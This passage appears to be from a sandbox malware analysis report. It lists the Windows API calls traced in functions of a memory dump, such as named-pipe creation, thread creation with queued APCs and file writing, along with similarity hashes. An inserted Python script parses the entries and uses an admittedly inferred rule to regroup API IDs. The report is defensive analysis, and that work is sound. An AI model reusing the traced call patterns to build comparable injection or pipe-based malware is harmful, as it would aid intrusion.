  • Part of subcall function 04BC3C4A: RtlFreeHeap.NTDLL(00000000,?,04BA30B5,00000000,?,00000104,04BC0BF9,?,00000250,?,00000000), ref: 04BC3C56
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
• String ID:
• API String ID: 1961997177-0
• Opcode ID: e5b027e53170c42bec24b47ab23e964f8cae39c9f391e8b403805be20d3af26c
• Instruction ID: 800b4afc8587059536ec6c105931caefde1a783d1ed7fda11e6488716e7783f4
• Opcode Fuzzy Hash: e5b027e53170c42bec24b47ab23e964f8cae39c9f391e8b403805be20d3af26c
• Instruction Fuzzy Hash: 64017572900308B7DB216FA5CCC5FDF7BADEF94758F1450AAB905A7100EA75E91187A0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BB7D41
• lstrlen.KERNEL32(05C8AAC0), ref: 04BB7D62
• RtlAllocateHeap.NTDLL(00000000,00000014), ref: 04BB7D7A
• lstrcpy.KERNEL32(00000000,05C8AAC0), ref: 04BB7D8C
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
• String ID:
• API String ID: 1929783139-0
• Opcode ID: 69ec526ad49659fb8cd088953ef0c7b6ce7d6f75c9db897f39a62c11cd82c1d0
• Instruction ID: f52970c51a14b5d09836dd4c4b5606372e4db07f5177edd9931c5a6adfacd564
• Opcode Fuzzy Hash: 69ec526ad49659fb8cd088953ef0c7b6ce7d6f75c9db897f39a62c11cd82c1d0
• Instruction Fuzzy Hash: 99018C75504244AFC711DFA9D8C4EBF7BBCEB8D641F140056E949D3241D674E904DBB0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
• RtlInitializeCriticalSection.NTDLL(04BCC300), ref: 04BAD488
• RtlInitializeCriticalSection.NTDLL(04BCC2E0), ref: 04BAD49E
• GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BAD4AF
• GetModuleHandleA.KERNEL32(0000170B), ref: 04BAD4E3
  • Part of subcall function 04BA1401: GetModuleHandleA.KERNEL32(?,00000001,77109EB0,00000000,?,?,?,?,00000000,04BAD4C6), ref: 04BA1419
  • Part of subcall function 04BA1401: LoadLibraryA.KERNEL32(?), ref: 04BA14BA
  • Part of subcall function 04BA1401: FreeLibrary.KERNEL32(00000000), ref: 04BA14C5
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
• String ID:
• API String ID: 1711133254-0
• Opcode ID: 3a15ece9934aaf70ecebdc68e719350a4e1c6203b674bedb3ba64635cc8656cf
• Instruction ID: 524d012d6c0a931da9c7d9bfafa12f8dacc7cd9b28b33059517b6d163455b03f
• Opcode Fuzzy Hash: 3a15ece9934aaf70ecebdc68e719350a4e1c6203b674bedb3ba64635cc8656cf
• Instruction Fuzzy Hash: 24115E729042148FEB10DFAEE8C89057FB9F76D30570005AFD649D7240D778AC258BA0
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 04BC1AD6: lstrlen.KERNEL32(?,?,00000000,04BA1C68), ref: 04BC1ADB
  • Part of subcall function 04BC1AD6: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04BC1AF0
  • Part of subcall function 04BC1AD6: wsprintfA.USER32 ref: 04BC1B0C
  • Part of subcall function 04BC1AD6: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04BC1B28
• CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 04BA1C80
• GetFileSize.KERNEL32(00000000,00000000), ref: 04BA1C8F
• CloseHandle.KERNEL32(00000000), ref: 04BA1C99
• GetLastError.KERNEL32 ref: 04BA1CA1
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
• String ID:
• API String ID: 4042893638-0
• Opcode ID: be7563fd55ba253e971a08b1bd0cae19aa530b22ed5a8741e48aeabbee92aa68
• Instruction ID: ab5c2ac939f83b9102dde4397cc2faafdcfc05513c9e5c4e61e7a024bc89e2be
• Opcode Fuzzy Hash: be7563fd55ba253e971a08b1bd0cae19aa530b22ed5a8741e48aeabbee92aa68
• Instruction Fuzzy Hash: C1F0F435209224BBD7612B79DCC8E9F7F6DFF057A0F104116F509EA080E674A95186B0
Uniqueness
Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,04BCC1A8,04BCC144), ref: 04BBD8E0
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BBD92B
                                                              • Part of subcall function 04BAE0F2: CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,04BC0483), ref: 04BAE109
                                                              • Part of subcall function 04BAE0F2: QueueUserAPC.KERNEL32(?,00000000,04BB5ADA,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE11E
                                                              • Part of subcall function 04BAE0F2: GetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE129
                                                              • Part of subcall function 04BAE0F2: TerminateThread.KERNEL32(00000000,00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE133
                                                              • Part of subcall function 04BAE0F2: CloseHandle.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE13A
                                                              • Part of subcall function 04BAE0F2: SetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE143
                                                            • GetLastError.KERNEL32(04BBAD22,00000000,00000000), ref: 04BBD913
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BBD923
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
                                                            • String ID:
                                                            • API String ID: 1700061692-0
                                                            • Opcode ID: d466ec377cadfc94c3ee9ffc9c63b28f7a6b2fb2a36cd78fba51612d31004e9d
                                                            • Instruction ID: eeb6ec5086c52d970c88404315c30fdf98fb9682d462b6129d8be47971d9b3c2
                                                            • Opcode Fuzzy Hash: d466ec377cadfc94c3ee9ffc9c63b28f7a6b2fb2a36cd78fba51612d31004e9d
                                                            • Instruction Fuzzy Hash: 04F0F471345211AFF3201A79DCC8EBA3B6CEB99335B10017AF6D6D32C0D6A81C128AB4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
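
Working with entries like the one above is easier once they are in structured form. The following Python script is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: it parses one function entry in the layout used on this page into call records, converts each `ref:` address into an offset relative to the dump base given on the Memory Dump Source line (the offset to seek to in the `.sdmp` file), and recomputes the `API ID` field. The grouping rule it implements is inferred from the entries on this page and is an assumption about the tool, not documented behaviour: split API names on CamelCase, keep tokens of four or more characters (so Get, Set, Rtl, Str and the A/W suffix drop out), count them across direct and subcall APIs, then list groups by descending count with `$` between groups and ASCII order inside a group. The `API String ID` hash is not reproduced. `SAMPLE_ENTRY` is the named-pipe function above, copied in as sample input.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import List, Optional

# Sample input: the CreateNamedPipeA function entry from this report, in the
# report's own layout (bullets, "Part of subcall function", "ref:" addresses).
SAMPLE_ENTRY = """\
APIs
• CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,04BCC1A8,04BCC144), ref: 04BBD8E0
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BBD92B
  • Part of subcall function 04BAE0F2: CreateThread.KERNEL32(00000000,00000000,00000000,?,00000000,04BC0483), ref: 04BAE109
  • Part of subcall function 04BAE0F2: QueueUserAPC.KERNEL32(?,00000000,04BB5ADA,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE11E
  • Part of subcall function 04BAE0F2: GetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE129
  • Part of subcall function 04BAE0F2: TerminateThread.KERNEL32(00000000,00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE133
  • Part of subcall function 04BAE0F2: CloseHandle.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE13A
  • Part of subcall function 04BAE0F2: SetLastError.KERNEL32(00000000,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BAE143
• GetLastError.KERNEL32(04BBAD22,00000000,00000000), ref: 04BBD913
• CloseHandle.KERNEL32(00000000), ref: 04BBD923
Memory Dump Source
• Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
Similarity
• API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
• String ID:
• API String ID: 1700061692-0
"""

# One "• Api.MODULE(args), ref: ADDR" line. Argument list and comma are optional
# because the report also emits lines such as "GetLastError.KERNEL32 ref: 04BA1CA1".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
BASE_RE = re.compile(r"Offset:\s*(?P<base>[0-9A-Fa-f]+)")
API_ID_RE = re.compile(r"^\s*•\s*API ID:\s*(?P<id>\S*)\s*$", re.MULTILINE)
# CamelCase split: "CreateFileW" -> Create, File, W; "lstrcatW" -> lstrcat, W.
TOKEN_RE = re.compile(r"[A-Z][a-z0-9]*|[a-z0-9]+")


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int                 # address of the call site in the dump
    subcall: Optional[str]   # owning function when the line is "Part of subcall"


def parse_calls(entry: str) -> List[Call]:
    """Extract every API call line of one function entry, subcalls included."""
    calls = []
    for line in entry.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), m.group("sub")))
    return calls


def dump_base(entry: str) -> int:
    """Base address from the 'Memory Dump Source' line."""
    m = BASE_RE.search(entry)
    if not m:
        raise ValueError("no 'Offset:' field in the Memory Dump Source line")
    return int(m.group("base"), 16)


def dump_offset(ref: int, base: int) -> int:
    """Call-site address relative to the dump base: the file offset inside the .sdmp."""
    return ref - base


def api_id(api_names) -> str:
    """Recompute the API ID. Rule inferred from this page's entries (assumption):
    CamelCase tokens of length >= 4, counted over all calls including subcalls,
    grouped by descending count, '$' between groups, ASCII order within a group."""
    counts = Counter(t for n in api_names for t in TOKEN_RE.findall(n) if len(t) >= 4)
    groups = {}
    for tok, n in counts.items():
        groups.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(groups[n])) for n in sorted(groups, reverse=True))


def stated_api_id(entry: str) -> str:
    """The API ID printed in the entry's Similarity block."""
    m = API_ID_RE.search(entry)
    return m.group("id") if m else ""


def api_id_matches(entry: str) -> bool:
    """True when the recomputed ID equals the one printed in the entry."""
    return api_id(c.api for c in parse_calls(entry)) == stated_api_id(entry)


if __name__ == "__main__":
    base = dump_base(SAMPLE_ENTRY)
    for c in parse_calls(SAMPLE_ENTRY):
        where = f"subcall {c.subcall}" if c.subcall else "direct"
        print(f"+{dump_offset(c.ref, base):06X} {c.api:<18} {c.module:<8} {where}")
    print("API ID consistent:", api_id_matches(SAMPLE_ENTRY))
```

Running the script prints one line per call site with its offset inside the dump file, which is what you need to locate the call in a disassembler view of the `.sdmp`; `api_id_matches` flags entries whose printed ID disagrees with the recomputed one, and `api_id` on its own lets you cluster functions from different reports by their API signature without depending on the tool's hash.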

                                                            APIs
                                                            • lstrcatW.KERNEL32(?,?), ref: 04BB8EBA
                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,04BBF1B3,00000000,04BBF1B4,00000080,00000000,00000000,04BC4C6A,00000000,04BBF1B3,?), ref: 04BB537E
                                                              • Part of subcall function 04BB533D: GetLastError.KERNEL32 ref: 04BB5388
                                                              • Part of subcall function 04BB533D: WaitForSingleObject.KERNEL32(000000C8), ref: 04BB53AD
                                                              • Part of subcall function 04BB533D: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 04BB53CE
                                                              • Part of subcall function 04BB533D: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 04BB53F6
                                                              • Part of subcall function 04BB533D: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 04BB540B
                                                              • Part of subcall function 04BB533D: SetEndOfFile.KERNEL32(00000001), ref: 04BB5418
                                                              • Part of subcall function 04BB533D: CloseHandle.KERNEL32(00000001), ref: 04BB5430
                                                            • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,04BAF15D,?,?,00001000,?,?,00001000), ref: 04BB8EDD
                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,04BAF15D,?,?,00001000,?,?,00001000), ref: 04BB8EFF
                                                            • GetLastError.KERNEL32(?,04BAF15D,?,?,00001000,?,?,00001000), ref: 04BB8F13
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                                                            • String ID:
                                                            • API String ID: 3370347312-0
                                                            • Opcode ID: 3bb461014113287dc7cd8bc5d8fac20f66a6f806f77f34b1705de2528ec48f31
                                                            • Instruction ID: c61ad9ad102c29e4ab3491d7b5f5e44f5bf22db1e61398142e8f3fb1dce17e07
                                                            • Opcode Fuzzy Hash: 3bb461014113287dc7cd8bc5d8fac20f66a6f806f77f34b1705de2528ec48f31
                                                            • Instruction Fuzzy Hash: 77F0A431244204BBDB223F60DC49FEA3B2AEF09751F100415F752E60D0E7B568219BB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • InterlockedExchange.KERNEL32(04BCC000,00000000), ref: 04BC013E
                                                            • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 04BC0159
                                                            • lstrcpy.KERNEL32(00000000,?), ref: 04BC0182
                                                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BC01A3
                                                              • Part of subcall function 04BB42B4: SetEvent.KERNEL32(?,?,04BAE0E1), ref: 04BB42C9
                                                              • Part of subcall function 04BB42B4: WaitForSingleObject.KERNEL32(?,000000FF,?,?,04BAE0E1), ref: 04BB42E9
                                                              • Part of subcall function 04BB42B4: CloseHandle.KERNEL32(00000000,?,04BAE0E1), ref: 04BB42F2
                                                              • Part of subcall function 04BB42B4: CloseHandle.KERNEL32(?,?,?,04BAE0E1), ref: 04BB42FC
                                                              • Part of subcall function 04BB42B4: RtlEnterCriticalSection.NTDLL(?), ref: 04BB4304
                                                              • Part of subcall function 04BB42B4: RtlLeaveCriticalSection.NTDLL(?), ref: 04BB431C
                                                              • Part of subcall function 04BB42B4: CloseHandle.KERNEL32(?), ref: 04BB4338
                                                              • Part of subcall function 04BB42B4: LocalFree.KERNEL32(?), ref: 04BB4343
                                                              • Part of subcall function 04BB42B4: RtlDeleteCriticalSection.NTDLL(?), ref: 04BB434D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                                                            • String ID:
                                                            • API String ID: 1103286547-0
                                                            • Opcode ID: 38033e8d13da41e64be244b5580326d9fd62c89912be8491529ec3a4893527ce
                                                            • Instruction ID: 55341ae1abc01cd45b1f4cf84b3ef634c6e5e73288a4b75b11d230d7ad5e2322
                                                            • Opcode Fuzzy Hash: 38033e8d13da41e64be244b5580326d9fd62c89912be8491529ec3a4893527ce
                                                            • Instruction Fuzzy Hash: CFF0C831740311BBE6302B71ECCAF4A3F69EB49B65F05005AB604F7290C968EC15CB70
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BA3C6A
                                                            • Sleep.KERNEL32(0000000A,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BA3C74
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BA3C9C
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BA3CBA
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 75dcfdeace7bc128d422fea6e69b81d8de67d7ea90cee24e95c2959c21e5540e
                                                            • Instruction ID: 520153cf2629da983c49acbdc23d16547590c9dd3fb8903ce3b4f7671f204b49
                                                            • Opcode Fuzzy Hash: 75dcfdeace7bc128d422fea6e69b81d8de67d7ea90cee24e95c2959c21e5540e
                                                            • Instruction Fuzzy Hash: 98F03A30604340AFEB209B65ECC9F1A3BB4FB18745F048446F85AEB291E628FC20CB25
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • RtlEnterCriticalSection.NTDLL(05C8B148), ref: 04BB0FFA
                                                            • Sleep.KERNEL32(0000000A,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB1004
                                                            • HeapFree.KERNEL32(00000000,?,?,?,04BB5ADA,00000000,00000000,?,?,00000000,04BA81F3), ref: 04BB1032
                                                            • RtlLeaveCriticalSection.NTDLL(05C8B148), ref: 04BB1047
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                            • String ID:
                                                            • API String ID: 58946197-0
                                                            • Opcode ID: 788c921a64c884338b9857cdf1a4d556474556db121ee3a86367779d1ed75f72
                                                            • Instruction ID: 6d28ef3b041cc6ae2999ccd79cbc357aeeedc5ca32d01e8bdc30e87b9e32eeef
                                                            • Opcode Fuzzy Hash: 788c921a64c884338b9857cdf1a4d556474556db121ee3a86367779d1ed75f72
                                                            • Instruction Fuzzy Hash: 44F0D474601244DFEB188F68E8E9F293B74FB18746B44404AE84AEB390C778FC00CA65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memcpy.NTDLL(?,?,?), ref: 04BB868E
                                                            • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 04BB86A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: 0x
                                                            • API String ID: 3510742995-3225541890
                                                            • Opcode ID: 57514487c463cc4279d06d861392230430d68a3f85a9bcaefe97a43ba75c9ff8
                                                            • Instruction ID: 26e054f1ae7664dfb07e99a7c00650279052def1ab52efcfa89045b1b4b6c064
                                                            • Opcode Fuzzy Hash: 57514487c463cc4279d06d861392230430d68a3f85a9bcaefe97a43ba75c9ff8
                                                            • Instruction Fuzzy Hash: 61017135900119BBDB01EFA8D8459EFBBBDEB48308F004455E915E7210EBB4EA09CBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.NTDLL ref: 04BA1DD6
                                                            • CloseHandle.KERNEL32(?,?,00000100,?,?), ref: 04BA1E24
                                                            • HeapFree.KERNEL32(00000000,?,?,?,00000094,04BA71A5,00000000,?,04BA1D00,00000000,?,04BAB6F6,00000000,?,04BAA4A1,00000000), ref: 04BA2168
                                                            • GetLastError.KERNEL32(?,?), ref: 04BA23AF
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseErrorFreeHandleHeapLastmemset
                                                            • String ID:
                                                            • API String ID: 2333114656-0
                                                            • Opcode ID: f9c2381ae905ccc8bfe94d02c41cf2ba32d6cb31e118922e9409de3c92651d00
                                                            • Instruction ID: 727b1e1335eb4ee22bde5fcd366582f19e9e7cc916f86ea723f0a88f49824025
                                                            • Opcode Fuzzy Hash: f9c2381ae905ccc8bfe94d02c41cf2ba32d6cb31e118922e9409de3c92651d00
                                                            • Instruction Fuzzy Hash: E941E83160C118FEEB256E74CC45FEF3BADEB46750F0040E2F905A6250E671F5719AA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: e814afb60deb28ff2095223114efd1503a7e1f25bef8475630c8f7fa2f334d9b
                                                            • Instruction ID: cf1e4f79a11d51771d80d3c057429611c61814b5bc96dc28fccb14dc0aa7404d
                                                            • Opcode Fuzzy Hash: e814afb60deb28ff2095223114efd1503a7e1f25bef8475630c8f7fa2f334d9b
                                                            • Instruction Fuzzy Hash: 9021AEF2504509BFCB249F60DC80A667B39FF0D318B480199E9C586810D772F8B1DBD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,04BA908A), ref: 04BB5CF4
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                              • Part of subcall function 04BC45A5: StrChrA.SHLWAPI(00000000,0000002F,00000000,00000000,04BB5D22,00000000,00000001,00000001,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60), ref: 04BC45B3
                                                              • Part of subcall function 04BC45A5: StrChrA.SHLWAPI(00000000,0000003F,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000,?,?,04BA908A,00000008,04BBB24C), ref: 04BC45BD
                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BB786C,00000000,00000000,00000000,00000008,0000EA60,00000000), ref: 04BB5D52
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04BB5D62
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04BB5D6E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3767559652-0
                                                            • Opcode ID: 09e8ba317c4f19dd4dccb50c92c69dc11123a9e2ad0da4212dea3f1e18b2290e
                                                            • Instruction ID: f1b75800afb7c760023e4ddafc3d5a51afdeec0f71cecf7e9b33729c0b2f6577
                                                            • Opcode Fuzzy Hash: 09e8ba317c4f19dd4dccb50c92c69dc11123a9e2ad0da4212dea3f1e18b2290e
                                                            • Instruction Fuzzy Hash: 0621D272504259BFDB229F78C888EFE7FF8EF09258F448195F8459B200D674EA00A7E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: 8de7f7e231b166f2716af6db8127298234bc8a7c57dad98130b045f549be7daa
                                                            • Instruction ID: b4a67ba7eb7152411e34987f2650a2b1c828e58a99b8ad49f7e9940a6b755f84
                                                            • Opcode Fuzzy Hash: 8de7f7e231b166f2716af6db8127298234bc8a7c57dad98130b045f549be7daa
                                                            • Instruction Fuzzy Hash: 4F11A0B2500909BFDB309FA0EC80AAAB73DFF0D318B040198FA8495811D772B5B1DBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(69B25F44,00000000,?,00000000,04BB1E61,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 04BA88E9
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,04BB38EE), ref: 04BA88EE
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • memcpy.NTDLL(00000000,?,00000000,?,?,?,?,?,?,?,04BB38EE), ref: 04BA890A
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04BA8928
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                                            • String ID:
                                                            • API String ID: 1697500751-0
                                                            • Opcode ID: f2509027ee0d7c4cfbf3752166080345baec805a76584cbe7af98a15dfbdc43b
                                                            • Instruction ID: bf051bea654861d7480362945777dc8554f0dfe73f413024d456331efdcf3f28
                                                            • Opcode Fuzzy Hash: f2509027ee0d7c4cfbf3752166080345baec805a76584cbe7af98a15dfbdc43b
                                                            • Instruction Fuzzy Hash: 5AF0F67B408741ABD321AA69DC88E5BBB9CEFD8311F440096E94487210E735E824CBB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlen.KERNEL32(05C89986,00000000,73BB81D0,00000000,04BB63E9,00000000), ref: 04BA95ED
                                                            • lstrlen.KERNEL32(?), ref: 04BA95F5
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • lstrcpy.KERNEL32(00000000,05C89986), ref: 04BA9609
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04BA9614
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                            • String ID:
                                                            • API String ID: 74227042-0
                                                            • Opcode ID: 339ee815958c8b49b5cd77ef005dc0efc51f67b7ffa7be25d726652507295bcc
                                                            • Instruction ID: 39672f7b5b02f77db4dcf307a68be0b2f87e6c16754c13338c4480ae7a38b241
                                                            • Opcode Fuzzy Hash: 339ee815958c8b49b5cd77ef005dc0efc51f67b7ffa7be25d726652507295bcc
                                                            • Instruction Fuzzy Hash: DCE01273505225A787119FE8DCC8CAFBBACEF9D651704445BFA01E3101C7299C159BB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%